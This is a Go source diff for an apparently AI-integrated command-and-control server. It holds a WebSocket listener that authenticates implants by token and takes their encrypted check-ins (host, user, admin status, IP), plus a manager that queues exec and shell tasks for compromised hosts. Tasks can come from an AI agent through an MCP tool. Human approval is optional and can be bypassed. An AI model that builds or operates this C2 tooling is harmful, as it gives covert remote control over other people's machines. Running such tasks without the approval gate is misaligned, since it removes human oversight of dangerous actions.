||||
type WebSocketListener struct {
|
||||
rec *database.C2Listener
|
||||
cfg *ListenerConfig
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
|
||||
srv *http.Server
|
||||
upgrader websocket.Upgrader
|
||||
|
||||
mu sync.Mutex
|
||||
conns map[string]*wsConn // session_id → 连接
|
||||
stopped bool
|
||||
stopCh chan struct{}
|
||||
}
|
||||
|
||||
// wsConn 单个 WS implant 的内存状态
|
||||
type wsConn struct {
|
||||
sessionID string
|
||||
ws *websocket.Conn
|
||||
writeMu sync.Mutex // websocket 同一连接同一时间只能一个 writer
|
||||
}
|
||||
|
||||
// NewWebSocketListener 工厂(注册到 ListenerRegistry["websocket"])
|
||||
func NewWebSocketListener(ctx ListenerCreationCtx) (Listener, error) {
|
||||
return &WebSocketListener{
|
||||
rec: ctx.Listener,
|
||||
cfg: ctx.Config,
|
||||
manager: ctx.Manager,
|
||||
logger: ctx.Logger,
|
||||
stopCh: make(chan struct{}),
|
||||
conns: make(map[string]*wsConn),
|
||||
upgrader: websocket.Upgrader{
|
||||
ReadBufferSize: 4096,
|
||||
WriteBufferSize: 4096,
|
||||
// 允许任意 Origin(implant 不带 Origin 或随便填)
|
||||
CheckOrigin: func(r *http.Request) bool { return true },
|
||||
},
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Type 类型
|
||||
func (l *WebSocketListener) Type() string { return string(ListenerTypeWebSocket) }
|
||||
|
||||
// Start 启动 HTTP server 接收 WS 升级
|
||||
func (l *WebSocketListener) Start() error {
|
||||
mux := http.NewServeMux()
|
||||
wsPath := l.cfg.BeaconCheckInPath
|
||||
if wsPath == "" || wsPath == "/check_in" {
|
||||
// websocket 默认路径单独定义,避免与 HTTP Beacon 默认路径混淆
|
||||
wsPath = "/ws"
|
||||
}
|
||||
mux.HandleFunc(wsPath, l.handleWS)
|
||||
|
||||
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
|
||||
ln, err := net.Listen("tcp", addr)
|
||||
if err != nil {
|
||||
if isAddrInUse(err) {
|
||||
return ErrPortInUse
|
||||
}
|
||||
return err
|
||||
}
|
||||
l.srv = &http.Server{
|
||||
Addr: addr,
|
||||
Handler: mux,
|
||||
ReadHeaderTimeout: 15 * time.Second,
|
||||
}
|
||||
go func() {
|
||||
if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) {
|
||||
l.logger.Warn("websocket Serve exited", zap.Error(err))
|
||||
}
|
||||
}()
|
||||
go l.taskDispatcherLoop()
|
||||
return nil
|
||||
}
|
||||
|
||||
// Stop 优雅关闭:通知所有 WS 客户端,关闭 server
|
||||
func (l *WebSocketListener) Stop() error {
|
||||
l.mu.Lock()
|
||||
if l.stopped {
|
||||
l.mu.Unlock()
|
||||
return nil
|
||||
}
|
||||
l.stopped = true
|
||||
close(l.stopCh)
|
||||
conns := make([]*wsConn, 0, len(l.conns))
|
||||
for _, c := range l.conns {
|
||||
conns = append(conns, c)
|
||||
}
|
||||
l.conns = make(map[string]*wsConn)
|
||||
l.mu.Unlock()
|
||||
for _, c := range conns {
|
||||
_ = c.ws.WriteControl(websocket.CloseMessage,
|
||||
websocket.FormatCloseMessage(websocket.CloseGoingAway, "shutdown"),
|
||||
time.Now().Add(time.Second))
|
||||
_ = c.ws.Close()
|
||||
}
|
||||
if l.srv != nil {
|
||||
ctx, cancel := contextWithTimeout(5 * time.Second)
|
||||
defer cancel()
|
||||
_ = l.srv.Shutdown(ctx)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (l *WebSocketListener) handleWS(w http.ResponseWriter, r *http.Request) {
|
||||
got := r.Header.Get("X-Implant-Token")
|
||||
if got == "" || l.rec.ImplantToken == "" ||
|
||||
subtle.ConstantTimeCompare([]byte(got), []byte(l.rec.ImplantToken)) != 1 {
|
||||
http.NotFound(w, r)
|
||||
return
|
||||
}
|
||||
ws, err := l.upgrader.Upgrade(w, r, nil)
|
||||
if err != nil {
|
||||
l.logger.Warn("websocket 升级失败", zap.Error(err))
|
||||
return
|
||||
}
|
||||
go l.handleConn(ws)
|
||||
}
|
||||
|
||||
// handleConn 处理一个 WS 连接的完整生命周期:等待 checkin → 登记 session → 读循环
|
||||
func (l *WebSocketListener) handleConn(ws *websocket.Conn) {
|
||||
ws.SetReadLimit(64 << 20)
|
||||
ws.SetReadDeadline(time.Now().Add(60 * time.Second))
|
||||
ws.SetPongHandler(func(string) error {
|
||||
ws.SetReadDeadline(time.Now().Add(60 * time.Second))
|
||||
return nil
|
||||
})
|
||||
|
||||
// 第一帧必须是 checkin
|
||||
frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey)
|
||||
if err != nil || frameType != "checkin" {
|
||||
_ = ws.Close()
|
||||
return
|
||||
}
|
||||
var req ImplantCheckInRequest
|
||||
if err := json.Unmarshal(body, &req); err != nil {
|
||||
_ = ws.Close()
|
||||
return
|
||||
}
|
||||
if req.SleepSeconds <= 0 {
|
||||
req.SleepSeconds = l.cfg.DefaultSleep
|
||||
}
|
||||
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
|
||||
if err != nil {
|
||||
_ = ws.Close()
|
||||
return
|
||||
}
|
||||
conn := &wsConn{sessionID: session.ID, ws: ws}
|
||||
l.mu.Lock()
|
||||
l.conns[session.ID] = conn
|
||||
l.mu.Unlock()
|
||||
defer func() {
|
||||
l.mu.Lock()
|
||||
delete(l.conns, session.ID)
|
||||
l.mu.Unlock()
|
||||
_ = ws.Close()
|
||||
_ = l.manager.MarkSessionDead(session.ID)
|
||||
}()
|
||||
|
||||
// 心跳 goroutine
|
||||
pingTicker := time.NewTicker(20 * time.Second)
|
||||
defer pingTicker.Stop()
|
||||
go func() {
|
||||
for {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
case <-pingTicker.C:
|
||||
conn.writeMu.Lock()
|
||||
_ = ws.WriteControl(websocket.PingMessage, nil, time.Now().Add(5*time.Second))
|
||||
conn.writeMu.Unlock()
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
// 主读循环:处理 result 等帧
|
||||
for {
|
||||
frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
switch frameType {
|
||||
case "result":
|
||||
var report TaskResultReport
|
||||
if err := json.Unmarshal(body, &report); err == nil {
|
||||
_ = l.manager.IngestTaskResult(report)
|
||||
}
|
||||
case "checkin":
|
||||
// 心跳更新:beacon 周期性送上心跳
|
||||
var hb ImplantCheckInRequest
|
||||
if err := json.Unmarshal(body, &hb); err == nil {
|
||||
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// taskDispatcherLoop 周期扫描所有活动 WS 会话,下发任务
|
||||
func (l *WebSocketListener) taskDispatcherLoop() {
|
||||
t := time.NewTicker(500 * time.Millisecond)
|
||||
defer t.Stop()
|
||||
for {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
case <-t.C:
|
||||
l.mu.Lock()
|
||||
snapshot := make([]*wsConn, 0, len(l.conns))
|
||||
for _, c := range l.conns {
|
||||
snapshot = append(snapshot, c)
|
||||
}
|
||||
l.mu.Unlock()
|
||||
for _, c := range snapshot {
|
||||
envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 20)
|
||||
if err != nil || len(envelopes) == 0 {
|
||||
continue
|
||||
}
|
||||
for _, env := range envelopes {
|
||||
l.sendTaskFrame(c, env)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (l *WebSocketListener) sendTaskFrame(c *wsConn, env TaskEnvelope) {
|
||||
frame := map[string]interface{}{"type": "task", "data": env}
|
||||
body, err := json.Marshal(frame)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
c.writeMu.Lock()
|
||||
defer c.writeMu.Unlock()
|
||||
_ = c.ws.SetWriteDeadline(time.Now().Add(10 * time.Second))
|
||||
_ = c.ws.WriteMessage(websocket.TextMessage, []byte(enc))
|
||||
}
|
||||
|
||||
// readEncryptedFrame 读一帧加密 WS 文本,返回类型和明文 data
|
||||
func readEncryptedFrame(ws *websocket.Conn, key string) (string, []byte, error) {
|
||||
mt, raw, err := ws.ReadMessage()
|
||||
if err != nil {
|
||||
return "", nil, err
|
||||
}
|
||||
if mt != websocket.TextMessage && mt != websocket.BinaryMessage {
|
||||
return "", nil, errors.New("unexpected ws frame type")
|
||||
}
|
||||
plain, err := DecryptAESGCM(key, string(raw))
|
||||
if err != nil {
|
||||
return "", nil, err
|
||||
}
|
||||
var env struct {
|
||||
Type string `json:"type"`
|
||||
Data json.RawMessage `json:"data"`
|
||||
}
|
||||
if err := json.Unmarshal(plain, &env); err != nil {
|
||||
return "", nil, err
|
||||
}
|
||||
return env.Type, env.Data, nil
|
||||
}
|
||||
|
||||
// contextWithTimeout 简单封装,避免 listener 文件之间反复 import context
|
||||
func contextWithTimeout(d time.Duration) (context.Context, context.CancelFunc) {
|
||||
return context.WithTimeout(context.Background(), d)
|
||||
}
|
||||
+779
@@ -0,0 +1,779 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"path/filepath"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Manager 是 C2 模块对外的统一门面:
|
||||
// - HTTP handler / MCP 工具 / 多代理 / 攻击链记录器 全部通过 Manager 操作 C2,
|
||||
// 不直接接触 listener 实现细节,避免循环依赖;
|
||||
// - 持有数据库句柄 + 事件总线 + 内存中的 listener 实例 map;
|
||||
// - 启动期可调用 RestoreRunningListeners() 把 status=running 的 listener 重新拉起。
|
||||
//
|
||||
// 实例化由 internal/app 负责,注入到全局 App 之后再分别交给 handler / mcp.
|
||||
type Manager struct {
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
bus *EventBus
|
||||
registry *ListenerRegistry
|
||||
|
||||
mu sync.RWMutex
|
||||
runningListeners map[string]Listener // listener_id → 已 Start 的 listener 实例
|
||||
storageDir string // 大结果(截图/下载)落盘根目录
|
||||
|
||||
hitlBridge HITLBridge // 危险任务在 EnqueueTask 时调它发起审批(nil 表示不接 HITL)
|
||||
hitlDangerousGate func(conversationID, mcpToolName string) bool // 与人机协同一致:为 nil 或返回 false 时不走桥
|
||||
hooks Hooks // 扩展挂钩:会话上线 / 任务完成 时通知漏洞库与攻击链
|
||||
}
|
||||
|
||||
// MCPToolC2Task 与 MCP builtin、c2_task 工具名一致,供 HITL 白名单与 Agent 侧对齐。
|
||||
const MCPToolC2Task = "c2_task"
|
||||
|
||||
// HITLBridge 把"危险任务"桥到现有 internal/handler/hitl 审批流的接口。
|
||||
// internal/app 实例化时传入;空实现表示禁用 HITL 拦截(开发期方便)。
|
||||
type HITLBridge interface {
|
||||
// RequestApproval 阻塞等待人工审批;返回 nil 表示批准,error 表示拒绝/超时。
|
||||
// ctx 携带用户/会话信息;危险任务调用时会创建超时 ctx 避免无限挂起。
|
||||
RequestApproval(ctx context.Context, req HITLApprovalRequest) error
|
||||
}
|
||||
|
||||
// HITLApprovalRequest 待审批的 C2 操作描述
|
||||
type HITLApprovalRequest struct {
|
||||
TaskID string
|
||||
SessionID string
|
||||
TaskType string
|
||||
PayloadJSON string
|
||||
ConversationID string
|
||||
Source string
|
||||
Reason string
|
||||
}
|
||||
|
||||
// Hooks 给上层(漏洞管理 / 攻击链)注入回调
|
||||
type Hooks struct {
|
||||
OnSessionFirstSeen func(session *database.C2Session) // 新会话首次上线
|
||||
OnTaskCompleted func(task *database.C2Task, sessionID string) // 任务完成(success/failed)
|
||||
}
|
||||
|
||||
// NewManager 创建 Manager;不会启动任何 listener,请显式调 RestoreRunningListeners
|
||||
func NewManager(db *database.DB, logger *zap.Logger, storageDir string) *Manager {
|
||||
if logger == nil {
|
||||
logger = zap.NewNop()
|
||||
}
|
||||
if storageDir == "" {
|
||||
storageDir = "tmp/c2"
|
||||
}
|
||||
return &Manager{
|
||||
db: db,
|
||||
logger: logger,
|
||||
bus: NewEventBus(),
|
||||
registry: NewListenerRegistry(),
|
||||
runningListeners: make(map[string]Listener),
|
||||
storageDir: storageDir,
|
||||
}
|
||||
}
|
||||
|
||||
// SetHITLBridge 设置危险任务审批桥;nil 表示禁用
|
||||
func (m *Manager) SetHITLBridge(b HITLBridge) {
|
||||
m.mu.Lock()
|
||||
m.hitlBridge = b
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
// SetHITLDangerousGate 设置 C2 危险任务是否应走 HITL 桥;须与 Agent 人机协同判定一致(例如 handler.HITLManager.NeedsToolApproval)。
|
||||
// gate 为 nil 时,即使已设置桥也不会对危险任务发起审批(与未开启人机协同时其他工具行为一致)。
|
||||
func (m *Manager) SetHITLDangerousGate(gate func(conversationID, mcpToolName string) bool) {
|
||||
m.mu.Lock()
|
||||
m.hitlDangerousGate = gate
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
// SetHooks 注入业务钩子
|
||||
func (m *Manager) SetHooks(h Hooks) {
|
||||
m.mu.Lock()
|
||||
m.hooks = h
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
// EventBus 暴露事件总线给 SSE handler
|
||||
func (m *Manager) EventBus() *EventBus { return m.bus }
|
||||
|
||||
// DB 暴露 DB 句柄给 handler/mcptools 直接读写(避免到处包装)
|
||||
func (m *Manager) DB() *database.DB { return m.db }
|
||||
|
||||
// Logger 暴露日志句柄
|
||||
func (m *Manager) Logger() *zap.Logger { return m.logger }
|
||||
|
||||
// StorageDir 大结果落盘根目录
|
||||
func (m *Manager) StorageDir() string { return m.storageDir }
|
||||
|
||||
// Registry 暴露 listener 注册表,便于在 internal/app 启动时按 type 注册具体实现
|
||||
func (m *Manager) Registry() *ListenerRegistry { return m.registry }
|
||||
|
||||
// Close 优雅关闭:停掉所有运行中的 listener,关闭事件总线
|
||||
func (m *Manager) Close() {
|
||||
m.mu.Lock()
|
||||
listeners := make([]Listener, 0, len(m.runningListeners))
|
||||
for _, l := range m.runningListeners {
|
||||
listeners = append(listeners, l)
|
||||
}
|
||||
m.runningListeners = make(map[string]Listener)
|
||||
m.mu.Unlock()
|
||||
for _, l := range listeners {
|
||||
_ = l.Stop()
|
||||
}
|
||||
m.bus.Close()
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// Listener 生命周期
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// CreateListenerInput Web/MCP 创建监听器的入参(已校验 + 已 trim)
|
||||
type CreateListenerInput struct {
|
||||
Name string
|
||||
Type string
|
||||
BindHost string
|
||||
BindPort int
|
||||
ProfileID string
|
||||
Remark string
|
||||
Config *ListenerConfig
|
||||
// CallbackHost 非空时写入 config_json.callback_host,供 Payload 默认回连(不修改 bind)
|
||||
CallbackHost string
|
||||
}
|
||||
|
||||
// CreateListener 校验并落库;不自动启动(与 systemd unit 一致:先创建后启动)
|
||||
func (m *Manager) CreateListener(in CreateListenerInput) (*database.C2Listener, error) {
|
||||
if strings.TrimSpace(in.Name) == "" {
|
||||
return nil, ErrInvalidInput
|
||||
}
|
||||
if !IsValidListenerType(in.Type) {
|
||||
return nil, ErrUnsupportedType
|
||||
}
|
||||
if err := SafeBindPort(in.BindPort); err != nil {
|
||||
return nil, &CommonError{Code: "invalid_port", Message: err.Error(), HTTP: 400}
|
||||
}
|
||||
bindHost := strings.TrimSpace(in.BindHost)
|
||||
if bindHost == "" {
|
||||
bindHost = "127.0.0.1" // 默认绑定环回,需要外网时操作员显式改
|
||||
}
|
||||
cfg := in.Config
|
||||
if cfg == nil {
|
||||
cfg = &ListenerConfig{}
|
||||
} else {
|
||||
cp := *cfg
|
||||
cfg = &cp
|
||||
}
|
||||
if ch := strings.TrimSpace(in.CallbackHost); ch != "" {
|
||||
cfg.CallbackHost = ch
|
||||
}
|
||||
cfg.ApplyDefaults()
|
||||
cfgJSON, err := json.Marshal(cfg)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("marshal listener config: %w", err)
|
||||
}
|
||||
keyB64, err := GenerateAESKey()
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("generate key: %w", err)
|
||||
}
|
||||
tokenB64, err := GenerateImplantToken()
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("generate token: %w", err)
|
||||
}
|
||||
|
||||
listener := &database.C2Listener{
|
||||
ID: "l_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14],
|
||||
Name: strings.TrimSpace(in.Name),
|
||||
Type: strings.ToLower(strings.TrimSpace(in.Type)),
|
||||
BindHost: bindHost,
|
||||
BindPort: in.BindPort,
|
||||
ProfileID: strings.TrimSpace(in.ProfileID),
|
||||
EncryptionKey: keyB64,
|
||||
ImplantToken: tokenB64,
|
||||
Status: "stopped",
|
||||
ConfigJSON: string(cfgJSON),
|
||||
Remark: strings.TrimSpace(in.Remark),
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
if err := m.db.CreateC2Listener(listener); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已创建", listener.Name), map[string]interface{}{
|
||||
"listener_id": listener.ID,
|
||||
"type": listener.Type,
|
||||
})
|
||||
return listener, nil
|
||||
}
|
||||
|
||||
// StartListener 启动指定 listener;幂等(已运行时返回 ErrListenerRunning)
|
||||
func (m *Manager) StartListener(id string) (*database.C2Listener, error) {
|
||||
rec, err := m.db.GetC2Listener(id)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if rec == nil {
|
||||
return nil, ErrListenerNotFound
|
||||
}
|
||||
m.mu.Lock()
|
||||
if _, ok := m.runningListeners[id]; ok {
|
||||
m.mu.Unlock()
|
||||
return rec, ErrListenerRunning
|
||||
}
|
||||
m.mu.Unlock()
|
||||
|
||||
cfg := &ListenerConfig{}
|
||||
if rec.ConfigJSON != "" {
|
||||
_ = json.Unmarshal([]byte(rec.ConfigJSON), cfg)
|
||||
}
|
||||
cfg.ApplyDefaults()
|
||||
|
||||
// 通过工厂创建具体实现。必须使用 rec 的副本:HTTP handler 在返回 JSON 前会清空
|
||||
// rec.ImplantToken / EncryptionKey 做脱敏,若 listener 实现持有同一指针会导致 beacon 鉴权永久失败。
|
||||
listenerRec := *rec
|
||||
factory := m.registry.Get(rec.Type)
|
||||
if factory == nil {
|
||||
return nil, ErrUnsupportedType
|
||||
}
|
||||
inst, err := factory(ListenerCreationCtx{
|
||||
Listener: &listenerRec,
|
||||
Config: cfg,
|
||||
Manager: m,
|
||||
Logger: m.logger.With(zap.String("listener_id", rec.ID), zap.String("type", rec.Type)),
|
||||
})
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if err := inst.Start(); err != nil {
|
||||
now := time.Now()
|
||||
_ = m.db.SetC2ListenerStatus(rec.ID, "error", err.Error(), &now)
|
||||
m.publishEvent("warn", "listener", "", "", fmt.Sprintf("监听器 %s 启动失败: %v", rec.Name, err), map[string]interface{}{
|
||||
"listener_id": rec.ID,
|
||||
})
|
||||
return nil, err
|
||||
}
|
||||
m.mu.Lock()
|
||||
m.runningListeners[rec.ID] = inst
|
||||
m.mu.Unlock()
|
||||
now := time.Now()
|
||||
_ = m.db.SetC2ListenerStatus(rec.ID, "running", "", &now)
|
||||
rec.Status = "running"
|
||||
rec.StartedAt = &now
|
||||
rec.LastError = ""
|
||||
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已启动", rec.Name), map[string]interface{}{
|
||||
"listener_id": rec.ID,
|
||||
"bind": fmt.Sprintf("%s:%d", rec.BindHost, rec.BindPort),
|
||||
})
|
||||
return rec, nil
|
||||
}
|
||||
|
||||
// StopListener 停止;幂等(未运行时返回 ErrListenerStopped)
|
||||
func (m *Manager) StopListener(id string) error {
|
||||
m.mu.Lock()
|
||||
inst, ok := m.runningListeners[id]
|
||||
if ok {
|
||||
delete(m.runningListeners, id)
|
||||
}
|
||||
m.mu.Unlock()
|
||||
if !ok {
|
||||
return ErrListenerStopped
|
||||
}
|
||||
if err := inst.Stop(); err != nil {
|
||||
return err
|
||||
}
|
||||
_ = m.db.SetC2ListenerStatus(id, "stopped", "", nil)
|
||||
rec, _ := m.db.GetC2Listener(id)
|
||||
name := id
|
||||
if rec != nil {
|
||||
name = rec.Name
|
||||
}
|
||||
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已停止", name), map[string]interface{}{
|
||||
"listener_id": id,
|
||||
})
|
||||
return nil
|
||||
}
|
||||
|
||||
// DeleteListener 停止并删除(级联 sessions/tasks/files)
|
||||
func (m *Manager) DeleteListener(id string) error {
|
||||
_ = m.StopListener(id)
|
||||
return m.db.DeleteC2Listener(id)
|
||||
}
|
||||
|
||||
// IsListenerRunning 内存中的运行状态(DB 中的 status 可能因崩溃而过时)
|
||||
func (m *Manager) IsListenerRunning(id string) bool {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
_, ok := m.runningListeners[id]
|
||||
return ok
|
||||
}
|
||||
|
||||
// RestoreRunningListeners 启动期把 DB 中 status=running 的 listener 重新拉起;
|
||||
// 失败的会被改为 status=error,不会阻塞整个 App 启动。
|
||||
func (m *Manager) RestoreRunningListeners() {
|
||||
listeners, err := m.db.ListC2Listeners()
|
||||
if err != nil {
|
||||
m.logger.Warn("恢复 C2 listener 失败:列表查询出错", zap.Error(err))
|
||||
return
|
||||
}
|
||||
for _, l := range listeners {
|
||||
if l.Status != "running" {
|
||||
continue
|
||||
}
|
||||
if _, err := m.StartListener(l.ID); err != nil && !errors.Is(err, ErrListenerRunning) {
|
||||
m.logger.Warn("恢复 C2 listener 失败", zap.String("listener_id", l.ID), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// Session 生命周期
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// IngestCheckIn beacon 上线/心跳的统一入口。
|
||||
// 行为:
|
||||
// 1. 若 implant_uuid 已有会话 → 更新心跳/状态
|
||||
// 2. 否则创建新会话,触发 OnSessionFirstSeen 钩子
|
||||
func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*database.C2Session, error) {
|
||||
if strings.TrimSpace(req.ImplantUUID) == "" {
|
||||
return nil, ErrInvalidInput
|
||||
}
|
||||
existing, err := m.db.GetC2SessionByImplantUUID(req.ImplantUUID)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
now := time.Now()
|
||||
isFirstSeen := existing == nil
|
||||
var sessID string
|
||||
if existing != nil {
|
||||
sessID = existing.ID
|
||||
} else {
|
||||
sessID = "s_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
}
|
||||
session := &database.C2Session{
|
||||
ID: sessID,
|
||||
ListenerID: listenerID,
|
||||
ImplantUUID: req.ImplantUUID,
|
||||
Hostname: req.Hostname,
|
||||
Username: req.Username,
|
||||
OS: strings.ToLower(req.OS),
|
||||
Arch: strings.ToLower(req.Arch),
|
||||
PID: req.PID,
|
||||
ProcessName: req.ProcessName,
|
||||
IsAdmin: req.IsAdmin,
|
||||
InternalIP: req.InternalIP,
|
||||
UserAgent: req.UserAgent,
|
||||
SleepSeconds: req.SleepSeconds,
|
||||
JitterPercent: req.JitterPercent,
|
||||
Status: string(SessionActive),
|
||||
FirstSeenAt: now,
|
||||
LastCheckIn: now,
|
||||
Metadata: req.Metadata,
|
||||
}
|
||||
if existing != nil {
|
||||
// 保留原 ID/FirstSeenAt/Note,避免被覆盖
|
||||
session.FirstSeenAt = existing.FirstSeenAt
|
||||
if session.Note == "" {
|
||||
session.Note = existing.Note
|
||||
}
|
||||
}
|
||||
if err := m.db.UpsertC2Session(session); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if isFirstSeen {
|
||||
m.publishEvent("critical", "session", session.ID, "",
|
||||
fmt.Sprintf("新会话上线: %s@%s (%s/%s)", session.Username, session.Hostname, session.OS, session.Arch),
|
||||
map[string]interface{}{
|
||||
"session_id": session.ID,
|
||||
"listener_id": listenerID,
|
||||
"hostname": session.Hostname,
|
||||
"os": session.OS,
|
||||
"arch": session.Arch,
|
||||
"internal_ip": session.InternalIP,
|
||||
})
|
||||
m.mu.RLock()
|
||||
hook := m.hooks.OnSessionFirstSeen
|
||||
m.mu.RUnlock()
|
||||
if hook != nil {
|
||||
go hook(session)
|
||||
}
|
||||
}
|
||||
// 普通心跳:last_check_in 已由 UpsertC2Session 写入 c2_sessions,不再落 c2_events。
|
||||
// 否则按 sleep 周期每条心跳一条审计,库表与 SSE 会被迅速撑爆;上线/掉线等仍照常 publishEvent。
|
||||
return session, nil
|
||||
}
|
||||
|
||||
// MarkSessionDead 心跳超时检测器调用:标记会话为 dead
|
||||
func (m *Manager) MarkSessionDead(sessionID string) error {
|
||||
if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil {
|
||||
return err
|
||||
}
|
||||
m.publishEvent("warn", "session", sessionID, "", "会话已离线(心跳超时)", nil)
|
||||
return nil
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// Task 生命周期
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// EnqueueTaskInput 下发任务入参
|
||||
type EnqueueTaskInput struct {
|
||||
SessionID string
|
||||
TaskType TaskType
|
||||
Payload map[string]interface{}
|
||||
Source string // manual|ai|batch|api
|
||||
ConversationID string
|
||||
UserCtx context.Context // 给 HITL 用
|
||||
BypassHITL bool // true 表示跳过 HITL 审批(仅供白名单机制 / 系统内部用)
|
||||
}
|
||||
|
||||
// EnqueueTask 入队一个新任务;若任务类型危险且未 BypassHITL,且 SetHITLDangerousGate 对当前会话与 MCPToolC2Task 返回 true,才会调 HITL 桥审批。
|
||||
// 返回任务记录;任务派发由 PopTasksForBeacon 在 beacon 拉任务时完成。
|
||||
func (m *Manager) EnqueueTask(in EnqueueTaskInput) (*database.C2Task, error) {
|
||||
if strings.TrimSpace(in.SessionID) == "" {
|
||||
return nil, ErrInvalidInput
|
||||
}
|
||||
session, err := m.db.GetC2Session(in.SessionID)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if session == nil {
|
||||
return nil, ErrSessionNotFound
|
||||
}
|
||||
if session.Status == string(SessionDead) || session.Status == string(SessionKilled) {
|
||||
return nil, &CommonError{Code: "session_inactive", Message: "会话已离线,无法下发任务", HTTP: 409}
|
||||
}
|
||||
|
||||
// OPSEC: command deny regex enforcement
|
||||
if in.TaskType == TaskTypeExec || in.TaskType == TaskTypeShell {
|
||||
cmd, _ := in.Payload["command"].(string)
|
||||
if cmd != "" {
|
||||
listenerCfg := m.getListenerConfig(session.ListenerID)
|
||||
if listenerCfg != nil {
|
||||
for _, pattern := range listenerCfg.CommandDenyRegex {
|
||||
re, err := regexp.Compile(pattern)
|
||||
if err != nil {
|
||||
m.logger.Warn("invalid command_deny_regex", zap.String("pattern", pattern), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
if re.MatchString(cmd) {
|
||||
return nil, &CommonError{
|
||||
Code: "command_denied",
|
||||
Message: fmt.Sprintf("命令被 OPSEC 规则拒绝 (匹配: %s)", pattern),
|
||||
HTTP: 403,
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// OPSEC: max_concurrent_tasks enforcement
|
||||
listenerCfg := m.getListenerConfig(session.ListenerID)
|
||||
if listenerCfg != nil && listenerCfg.MaxConcurrentTasks > 0 {
|
||||
activeTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{
|
||||
SessionID: in.SessionID,
|
||||
Status: string(TaskQueued),
|
||||
})
|
||||
sentTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{
|
||||
SessionID: in.SessionID,
|
||||
Status: string(TaskSent),
|
||||
})
|
||||
concurrent := len(activeTasks) + len(sentTasks)
|
||||
if concurrent >= listenerCfg.MaxConcurrentTasks {
|
||||
return nil, &CommonError{
|
||||
Code: "concurrent_limit",
|
||||
Message: fmt.Sprintf("会话已有 %d 个排队/执行中的任务,超过并发上限 %d", concurrent, listenerCfg.MaxConcurrentTasks),
|
||||
HTTP: 429,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
taskID := "t_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
|
||||
task := &database.C2Task{
|
||||
ID: taskID,
|
||||
SessionID: in.SessionID,
|
||||
TaskType: string(in.TaskType),
|
||||
Payload: in.Payload,
|
||||
Status: string(TaskQueued),
|
||||
Source: strOr(in.Source, "manual"),
|
||||
ConversationID: in.ConversationID,
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
|
||||
// HITL 检查:仅当注入的 gate 认为当前会话应对统一 MCP 工具 c2_task 做人机协同时才走桥(关闭人机协同时与其它工具一致,直接入队)。
|
||||
if IsDangerousTaskType(in.TaskType) && !in.BypassHITL {
|
||||
m.mu.RLock()
|
||||
bridge := m.hitlBridge
|
||||
gate := m.hitlDangerousGate
|
||||
m.mu.RUnlock()
|
||||
convID := strings.TrimSpace(in.ConversationID)
|
||||
useBridge := bridge != nil && gate != nil && gate(convID, MCPToolC2Task)
|
||||
if useBridge {
|
||||
task.ApprovalStatus = "pending"
|
||||
if err := m.db.CreateC2Task(task); err != nil {
|
||||
